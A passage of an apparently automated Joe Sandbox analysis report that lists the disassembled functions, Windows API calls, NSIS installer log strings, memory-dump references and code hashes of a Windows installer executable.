                                                                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2740478559-0
                                                                                                    • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                    • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                                    Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                      • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                      • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                    Strings
                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                    • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                                    • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                    • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                                                    • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                    Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                    • GetMessagePos.USER32 ref: 00404871
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                    • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                    • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                    • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                    Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                    • MulDiv.KERNEL32(00010A00,00000064,?), ref: 00403295
                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                    Strings
                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-82062127
                                                                                                    • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                    • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                    • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                    • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                    Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                    • wsprintfW.USER32 ref: 00404457
                                                                                                    • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s$@rD
                                                                                                    • API String ID: 3540041739-1813061909
                                                                                                    • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                    • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                    • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                                    • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                    Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                    • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                    • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$Prev
                                                                                                    • String ID: *?|<>/":
                                                                                                    • API String ID: 589700163-165019052
                                                                                                    • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                    • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                    • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                    • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                    Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1912718029-0
                                                                                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                    Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                    • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                    Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                                    Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                    • API String ID: 1697273262-1764544995
                                                                                                    • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                                    • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                                                    Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 00404902
                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID: $@rD
                                                                                                    • API String ID: 3748168415-881980237
                                                                                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                                                    Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                      • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                                    • API String ID: 2577523808-3778932970
                                                                                                    • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                    • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                                                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                    Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcatwsprintf
                                                                                                    • String ID: %02x%c$...
                                                                                                    • API String ID: 3065427908-1057055748
                                                                                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
